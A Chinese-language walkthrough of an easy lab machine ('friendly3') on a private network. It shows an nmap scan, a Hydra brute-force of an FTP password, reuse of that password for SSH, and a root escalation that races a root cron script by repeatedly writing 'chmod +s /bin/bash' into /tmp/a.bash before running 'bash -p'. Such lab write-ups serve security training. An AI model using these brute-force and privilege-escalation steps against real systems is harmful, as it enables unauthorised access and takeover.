难度:easy
kali:192.168.56.104
靶机:192.168.56.156
端口扫描
┌──(root㉿kali2)-[~/Desktop]
└─# nmap 192.168.56.156 -sV -A
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-20 12:20 CST
Nmap scan report for 192.168.56.156
Host is up (0.00067s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 9.2p1 Debian 2 (protocol 2.0)
| ssh-hostkey:
| 256 bc:46:3d:85:18:bf:c7:bb:14:26:9a:20:6c:d3:39:52 (ECDSA)
|_ 256 7b:13:5a:46:a5:62:33:09:24:9d:3e:67:b6:eb:3f:a1 (ED25519)
80/tcp open http nginx 1.22.1
|_http-server-header: nginx/1.22.1
|_http-title: Welcome to nginx!
MAC Address: 08:00:27:8E:DD:57 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.67 ms 192.168.56.156
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.36 seconds开放了 21 22 80 三个端口,不过这次21端口没有匿名登录
web信息搜集
Hi, sysadmin
I want you to know that I’ve just uploaded the new files into the FTP Server.
See you,
juan.
juan把最新文件上传到了FTP服务,但是没有密码,扫一下目录看有什么信息
┌──(root㉿kali2)-[~/Desktop]
└─#
gobuster dir -u http://192.168.56.156 -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.156
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,php,bak,zip,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 355]
Progress: 1323360 / 1323366 (100.00%)
===============================================================
Finished
===============================================================啥也没扫到,只能爆破一下ftp的密码
┌──(root㉿kali2)-[~/Desktop]
└─# hydra -l juan -P /usr/share/wordlists/rockyou.txt ftp://192.168.56.156
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-20 12:26:34
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://192.168.56.156:21/
[21][ftp] host: 192.168.56.156 login: juan password: alexis
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-20 12:27:09juan的密码是alexis
ftp连接
┌──(root㉿kali2)-[~/Desktop]
└─# ftp 192.168.56.156
Connected to 192.168.56.156.
220 (vsFTPd 3.0.3)
Name (192.168.56.156:root): juan
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||13109|)
150 Here comes the directory listing.
drwxr-xr-x 14 0 0 4096 Jun 25 2023 .
drwxr-xr-x 14 0 0 4096 Jun 25 2023 ..
-rw-r--r-- 1 0 0 0 Jun 25 2023 file1
-rw-r--r-- 1 0 0 0 Jun 25 2023 file10
-rw-r--r-- 1 0 0 0 Jun 25 2023 file100
-rw-r--r-- 1 0 0 0 Jun 25 2023 file11
-rw-r--r-- 1 0 0 0 Jun 25 2023 file12
-rw-r--r-- 1 0 0 0 Jun 25 2023 file13
-rw-r--r-- 1 0 0 0 Jun 25 2023 file14
-rw-r--r-- 1 0 0 0 Jun 25 2023 file15
-rw-r--r-- 1 0 0 0 Jun 25 2023 file16
-rw-r--r-- 1 0 0 0 Jun 25 2023 file17
-rw-r--r-- 1 0 0 0 Jun 25 2023 file18
-rw-r--r-- 1 0 0 0 Jun 25 2023 file19
-rw-r--r-- 1 0 0 0 Jun 25 2023 file2
-rw-r--r-- 1 0 0 0 Jun 25 2023 file20
-rw-r--r-- 1 0 0 0 Jun 25 2023 file21
-rw-r--r-- 1 0 0 0 Jun 25 2023 file22
-rw-r--r-- 1 0 0 0 Jun 25 2023 file23
-rw-r--r-- 1 0 0 0 Jun 25 2023 file24
-rw-r--r-- 1 0 0 0 Jun 25 2023 file25
-rw-r--r-- 1 0 0 0 Jun 25 2023 file26
-rw-r--r-- 1 0 0 0 Jun 25 2023 file27
-rw-r--r-- 1 0 0 0 Jun 25 2023 file28
-rw-r--r-- 1 0 0 0 Jun 25 2023 file29
-rw-r--r-- 1 0 0 0 Jun 25 2023 file3
-rw-r--r-- 1 0 0 0 Jun 25 2023 file30
-rw-r--r-- 1 0 0 0 Jun 25 2023 file31
-rw-r--r-- 1 0 0 0 Jun 25 2023 file32
-rw-r--r-- 1 0 0 0 Jun 25 2023 file33
-rw-r--r-- 1 0 0 0 Jun 25 2023 file34
-rw-r--r-- 1 0 0 0 Jun 25 2023 file35
-rw-r--r-- 1 0 0 0 Jun 25 2023 file36
-rw-r--r-- 1 0 0 0 Jun 25 2023 file37
-rw-r--r-- 1 0 0 0 Jun 25 2023 file38
-rw-r--r-- 1 0 0 0 Jun 25 2023 file39
-rw-r--r-- 1 0 0 0 Jun 25 2023 file4
-rw-r--r-- 1 0 0 0 Jun 25 2023 file40
-rw-r--r-- 1 0 0 0 Jun 25 2023 file41
-rw-r--r-- 1 0 0 0 Jun 25 2023 file42
-rw-r--r-- 1 0 0 0 Jun 25 2023 file43
-rw-r--r-- 1 0 0 0 Jun 25 2023 file44
-rw-r--r-- 1 0 0 0 Jun 25 2023 file45
-rw-r--r-- 1 0 0 0 Jun 25 2023 file46
-rw-r--r-- 1 0 0 0 Jun 25 2023 file47
-rw-r--r-- 1 0 0 0 Jun 25 2023 file48
-rw-r--r-- 1 0 0 0 Jun 25 2023 file49
-rw-r--r-- 1 0 0 0 Jun 25 2023 file5
-rw-r--r-- 1 0 0 0 Jun 25 2023 file50
-rw-r--r-- 1 0 0 0 Jun 25 2023 file51
-rw-r--r-- 1 0 0 0 Jun 25 2023 file52
-rw-r--r-- 1 0 0 0 Jun 25 2023 file53
-rw-r--r-- 1 0 0 0 Jun 25 2023 file54
-rw-r--r-- 1 0 0 0 Jun 25 2023 file55
-rw-r--r-- 1 0 0 0 Jun 25 2023 file56
-rw-r--r-- 1 0 0 0 Jun 25 2023 file57
-rw-r--r-- 1 0 0 0 Jun 25 2023 file58
-rw-r--r-- 1 0 0 0 Jun 25 2023 file59
-rw-r--r-- 1 0 0 0 Jun 25 2023 file6
-rw-r--r-- 1 0 0 0 Jun 25 2023 file60
-rw-r--r-- 1 0 0 0 Jun 25 2023 file61
-rw-r--r-- 1 0 0 0 Jun 25 2023 file62
-rw-r--r-- 1 0 0 0 Jun 25 2023 file63
-rw-r--r-- 1 0 0 0 Jun 25 2023 file64
-rw-r--r-- 1 0 0 0 Jun 25 2023 file65
-rw-r--r-- 1 0 0 0 Jun 25 2023 file66
-rw-r--r-- 1 0 0 0 Jun 25 2023 file67
-rw-r--r-- 1 0 0 0 Jun 25 2023 file68
-rw-r--r-- 1 0 0 0 Jun 25 2023 file69
-rw-r--r-- 1 0 0 0 Jun 25 2023 file7
-rw-r--r-- 1 0 0 0 Jun 25 2023 file70
-rw-r--r-- 1 0 0 0 Jun 25 2023 file71
-rw-r--r-- 1 0 0 0 Jun 25 2023 file72
-rw-r--r-- 1 0 0 0 Jun 25 2023 file73
-rw-r--r-- 1 0 0 0 Jun 25 2023 file74
-rw-r--r-- 1 0 0 0 Jun 25 2023 file75
-rw-r--r-- 1 0 0 0 Jun 25 2023 file76
-rw-r--r-- 1 0 0 0 Jun 25 2023 file77
-rw-r--r-- 1 0 0 0 Jun 25 2023 file78
-rw-r--r-- 1 0 0 0 Jun 25 2023 file79
-rw-r--r-- 1 0 0 0 Jun 25 2023 file8
-rw-r--r-- 1 0 0 36 Jun 25 2023 file80
-rw-r--r-- 1 0 0 0 Jun 25 2023 file81
-rw-r--r-- 1 0 0 0 Jun 25 2023 file82
-rw-r--r-- 1 0 0 0 Jun 25 2023 file83
-rw-r--r-- 1 0 0 0 Jun 25 2023 file84
-rw-r--r-- 1 0 0 0 Jun 25 2023 file85
-rw-r--r-- 1 0 0 0 Jun 25 2023 file86
-rw-r--r-- 1 0 0 0 Jun 25 2023 file87
-rw-r--r-- 1 0 0 0 Jun 25 2023 file88
-rw-r--r-- 1 0 0 0 Jun 25 2023 file89
-rw-r--r-- 1 0 0 0 Jun 25 2023 file9
-rw-r--r-- 1 0 0 0 Jun 25 2023 file90
-rw-r--r-- 1 0 0 0 Jun 25 2023 file91
-rw-r--r-- 1 0 0 0 Jun 25 2023 file92
-rw-r--r-- 1 0 0 0 Jun 25 2023 file93
-rw-r--r-- 1 0 0 0 Jun 25 2023 file94
-rw-r--r-- 1 0 0 0 Jun 25 2023 file95
-rw-r--r-- 1 0 0 0 Jun 25 2023 file96
-rw-r--r-- 1 0 0 0 Jun 25 2023 file97
-rw-r--r-- 1 0 0 0 Jun 25 2023 file98
-rw-r--r-- 1 0 0 0 Jun 25 2023 file99
drwxr-xr-x 2 0 0 4096 Jun 25 2023 fold10
drwxr-xr-x 2 0 0 4096 Jun 25 2023 fold11
drwxr-xr-x 2 0 0 4096 Jun 25 2023 fold12
drwxr-xr-x 2 0 0 4096 Jun 25 2023 fold13
drwxr-xr-x 2 0 0 4096 Jun 25 2023 fold14
drwxr-xr-x 2 0 0 4096 Jun 25 2023 fold15
drwxr-xr-x 2 0 0 4096 Jun 25 2023 fold4
drwxr-xr-x 2 0 0 4096 Jun 25 2023 fold5
drwxr-xr-x 2 0 0 4096 Jun 25 2023 fold6
drwxr-xr-x 2 0 0 4096 Jun 25 2023 fold7
drwxr-xr-x 2 0 0 4096 Jun 25 2023 fold8
drwxr-xr-x 2 0 0 4096 Jun 25 2023 fold9
-rw-r--r-- 1 0 0 58 Jun 25 2023 fole32
226 Directory send OK.有多好文件,不过好多都是空的
把有信息的文件都列出来
┌──(root㉿kali2)-[~/Desktop]
└─# cat file80
Hi, I'm the sysadmin. I am bored...
┌──(root㉿kali2)-[~/Desktop]
└─# cat fole32
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabba
┌──(root㉿kali2)-[~/Desktop]
└─# rm file80
┌──(root㉿kali2)-[~/Desktop]
└─# rm fole32
┌──(root㉿kali2)-[~/Desktop]
└─# cat .test.txt
Hi, I'am juan another time. I want you to know that I found "cookie" in a file called "zlcnffjbeq.gkg" into my home folder. I think it's from another user, IDK...
┌──(root㉿kali2)-[~/Desktop]
└─# cat yt.txt
Thanks to all my YT subscribers!
┌──(root㉿kali2)-[~/Desktop]
└─# cat passwd.txt
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠟⠛⠛⠛⠋⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠙⠛⠛⠛⠿⠻⠿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠋⠀⠀⠀⠀⠀⡀⠠⠤⠒⢂⣉⣉⣉⣑⣒⣒⠒⠒⠒⠒⠒⠒⠒⠀⠀⠐⠒⠚⠻⠿⠿⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⠏⠀⠀⠀⠀⡠⠔⠉⣀⠔⠒⠉⣀⣀⠀⠀⠀⣀⡀⠈⠉⠑⠒⠒⠒⠒⠒⠈⠉⠉⠉⠁⠂⠀⠈⠙⢿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⠇⠀⠀⠀⠔⠁⠠⠖⠡⠔⠊⠀⠀⠀⠀⠀⠀⠀⠐⡄⠀⠀⠀⠀⠀⠀⡄⠀⠀⠀⠀⠉⠲⢄⠀⠀⠀⠈⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⠋⠀⠀⠀⠀⠀⠀⠀⠊⠀⢀⣀⣤⣤⣤⣤⣀⠀⠀⠀⢸⠀⠀⠀⠀⠀⠜⠀⠀⠀⠀⣀⡀⠀⠈⠃⠀⠀⠀⠸⣿⣿⣿⣿
⣿⣿⣿⣿⡿⠥⠐⠂⠀⠀⠀⠀⡄⠀⠰⢺⣿⣿⣿⣿⣿⣟⠀⠈⠐⢤⠀⠀⠀⠀⠀⠀⢀⣠⣶⣾⣯⠀⠀⠉⠂⠀⠠⠤⢄⣀⠙⢿⣿⣿
⣿⡿⠋⠡⠐⠈⣉⠭⠤⠤⢄⡀⠈⠀⠈⠁⠉⠁⡠⠀⠀⠀⠉⠐⠠⠔⠀⠀⠀⠀⠀⠲⣿⠿⠛⠛⠓⠒⠂⠀⠀⠀⠀⠀⠀⠠⡉⢢⠙⣿
⣿⠀⢀⠁⠀⠊⠀⠀⠀⠀⠀⠈⠁⠒⠂⠀⠒⠊⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⢀⣀⡠⠔⠒⠒⠂⠀⠈⠀⡇⣿
⣿⠀⢸⠀⠀⠀⢀⣀⡠⠋⠓⠤⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠄⠀⠀⠀⠀⠀⠀⠈⠢⠤⡀⠀⠀⠀⠀⠀⠀⢠⠀⠀⠀⡠⠀⡇⣿
⣿⡀⠘⠀⠀⠀⠀⠀⠘⡄⠀⠀⠀⠈⠑⡦⢄⣀⠀⠀⠐⠒⠁⢸⠀⠀⠠⠒⠄⠀⠀⠀⠀⠀⢀⠇⠀⣀⡀⠀⠀⢀⢾⡆⠀⠈⡀⠎⣸⣿
⣿⣿⣄⡈⠢⠀⠀⠀⠀⠘⣶⣄⡀⠀⠀⡇⠀⠀⠈⠉⠒⠢⡤⣀⡀⠀⠀⠀⠀⠀⠐⠦⠤⠒⠁⠀⠀⠀⠀⣀⢴⠁⠀⢷⠀⠀⠀⢰⣿⣿
⣿⣿⣿⣿⣇⠂⠀⠀⠀⠀⠈⢂⠀⠈⠹⡧⣀⠀⠀⠀⠀⠀⡇⠀⠀⠉⠉⠉⢱⠒⠒⠒⠒⢖⠒⠒⠂⠙⠏⠀⠘⡀⠀⢸⠀⠀⠀⣿⣿⣿
⣿⣿⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠑⠄⠰⠀⠀⠁⠐⠲⣤⣴⣄⡀⠀⠀⠀⠀⢸⠀⠀⠀⠀⢸⠀⠀⠀⠀⢠⠀⣠⣷⣶⣿⠀⠀⢰⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠀⠁⢀⠀⠀⠀⠀⠀⡙⠋⠙⠓⠲⢤⣤⣷⣤⣤⣤⣤⣾⣦⣤⣤⣶⣿⣿⣿⣿⡟⢹⠀⠀⢸⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣧⡀⠀⠀⠀⠀⠀⠀⠀⠑⠀⢄⠀⡰⠁⠀⠀⠀⠀⠀⠈⠉⠁⠈⠉⠻⠋⠉⠛⢛⠉⠉⢹⠁⢀⢇⠎⠀⠀⢸⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣦⣀⠈⠢⢄⡉⠂⠄⡀⠀⠈⠒⠢⠄⠀⢀⣀⣀⣰⠀⠀⠀⠀⠀⠀⠀⠀⡀⠀⢀⣎⠀⠼⠊⠀⠀⠀⠘⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣄⡀⠉⠢⢄⡈⠑⠢⢄⡀⠀⠀⠀⠀⠀⠀⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠁⠀⠀⢀⠀⠀⠀⠀⠀⢻⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣦⣀⡈⠑⠢⢄⡀⠈⠑⠒⠤⠄⣀⣀⠀⠉⠉⠉⠉⠀⠀⠀⣀⡀⠤⠂⠁⠀⢀⠆⠀⠀⢸⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣦⣄⡀⠁⠉⠒⠂⠤⠤⣀⣀⣉⡉⠉⠉⠉⠉⢀⣀⣀⡠⠤⠒⠈⠀⠀⠀⠀⣸⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣶⣤⣄⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⣶⣶⣶⣤⣤⣤⣤⣀⣀⣤⣤⣤⣶⣾⣿⣿⣿⣿⣿除了说在它的home下有一个zlcnffjbeq.gkg文件里面有cookie其他也没什么有用信息
ssh登录
用相同的密码测试登录ssh发现登录成功juan:alexis
┌──(root㉿kali2)-[~/Desktop]
└─# ssh juan@192.168.56.156
The authenticity of host '192.168.56.156 (192.168.56.156)' can't be established.
ED25519 key fingerprint is SHA256:qcoxC68+orQ8LIJrunR2ElUTnj9X5X0OFj9F/oxHDjc.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.156' (ED25519) to the list of known hosts.
juan@192.168.56.156's password:
Linux friendly3 6.1.0-9-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.27-1 (2023-05-08) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
juan@friendly3:~$ id
uid=1001(juan) gid=1001(juan) groups=1001(juan)
juan@friendly3:~$ ls -al
total 28
drwxr-xr-x 3 juan juan 4096 Jul 17 2023 .
drwxr-xr-x 4 root root 4096 Jun 25 2023 ..
lrwxrwxrwx 1 root root 9 Jun 25 2023 .bash_history -> /dev/null
-rw-r--r-- 1 juan juan 220 Apr 23 2023 .bash_logout
-rw-r--r-- 1 juan juan 3526 Apr 23 2023 .bashrc
drwxr-xr-x 14 root root 4096 Jun 25 2023 ftp
-rw-r--r-- 1 juan juan 807 Apr 23 2023 .profile
-r-------- 1 juan juan 33 Jul 17 2023 user.txt拿到user flag
提权root
在/opt里面发现一个脚本文件
juan@friendly3:/opt$ ls -al
total 12
drwxr-xr-x 2 root root 4096 Jun 25 2023 .
drwxr-xr-x 18 root root 4096 Jun 25 2023 ..
-rwxr-xr-x 1 root root 190 Jun 25 2023 check_for_install.sh
juan@friendly3:/opt$ cat check_for_install.sh
#!/bin/bash
/usr/bin/curl "http://127.0.0.1/9842734723948024.bash" > /tmp/a.bash
chmod +x /tmp/a.bash
chmod +r /tmp/a.bash
chmod +w /tmp/a.bash
/bin/bash /tmp/a.bash
rm -rf /tmp/a.bash会获取http://127.0.0.1/9842734723948024.bash的内容然后执行 并且是root权限
juan@friendly3:/opt$ curl http://127.0.0.1/9842734723948024.bash
#test盲猜是个定时任务,穿个pspy64看一下,没有wget用scp传过去
┌──(root㉿kali2)-[~/Desktop]
└─# scp pspy64 juan@192.168.56.156:/tmp
juan@192.168.56.156's password:
pspy64 100% 3006KB 17.1MB/s 00:00 2024/04/20 01:06:37 CMD: UID=0 PID=1 | /sbin/init
2024/04/20 01:07:01 CMD: UID=0 PID=1266 | /usr/sbin/CRON -f
2024/04/20 01:07:01 CMD: UID=0 PID=1267 | /bin/sh -c /opt/check_for_install.sh
2024/04/20 01:07:01 CMD: UID=0 PID=1268 | /bin/sh -c /opt/check_for_install.sh
2024/04/20 01:07:01 CMD: UID=0 PID=1269 | /bin/bash /opt/check_for_install.sh
2024/04/20 01:07:01 CMD: UID=0 PID=1270 |
2024/04/20 01:07:01 CMD: UID=0 PID=1272 |
2024/04/20 01:07:01 CMD: UID=0 PID=1274 | /bin/bash /opt/check_for_install.sh
2024/04/20 01:08:01 CMD: UID=0 PID=1275 | /usr/sbin/CRON -f
2024/04/20 01:08:01 CMD: UID=0 PID=1276 | /usr/sbin/CRON -f
2024/04/20 01:08:01 CMD: UID=0 PID=1277 | /bin/bash /opt/check_for_install.sh
2024/04/20 01:08:01 CMD: UID=0 PID=1278 | /bin/bash /opt/check_for_install.sh
2024/04/20 01:08:01 CMD: UID=0 PID=1279 | chmod +x /tmp/a.bash
2024/04/20 01:08:01 CMD: UID=0 PID=1280 | chmod +r /tmp/a.bash
2024/04/20 01:08:01 CMD: UID=0 PID=1281 |
2024/04/20 01:08:01 CMD: UID=0 PID=1283 | /bin/bash /opt/check_for_install.sh 根据进程看是一分钟执行一次
那么可以写一个不断执行的脚本往a.bash里面添加提权的指令,在写入和执行的间隙写入a.bash
juan@friendly3:/tmp$ while true;do echo 'chmod +s /bin/bash' >a.bash;done
^Cchmod +s /bin/bash
juan@friendly3:/tmp$ ls -al
total 3036
drwxrwxrwt 7 root root 4096 Apr 20 01:17 .
drwxr-xr-x 18 root root 4096 Jun 25 2023 ..
-rw-r--r-- 1 juan juan 0 Apr 20 01:17 a.bash
drwxrwxrwt 2 root root 4096 Apr 20 00:16 .font-unix
drwxrwxrwt 2 root root 4096 Apr 20 00:16 .ICE-unix
-rwx--x--x 1 juan juan 3078592 Apr 20 01:05 pspy64
drwx------ 3 root root 4096 Apr 20 00:16 systemd-private-1fd946a609ca4ee0b079518a508648f6-systemd-logind.service-fTyK0a
drwxrwxrwt 2 root root 4096 Apr 20 00:16 .X11-unix
drwxrwxrwt 2 root root 4096 Apr 20 00:16 .XIM-unix
juan@friendly3:/tmp$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1265648 Apr 23 2023 /bin/bash
juan@friendly3:/tmp$ basp -p
-bash: basp: command not found
juan@friendly3:/tmp$ bash -p
bash-5.2# id
uid=1001(juan) gid=1001(juan) euid=0(root) egid=0(root) groups=0(root),1001(juan)
bash-5.2# cat /root/r*
eb9748b67f25e6bd202e5fa25f534d51拿到root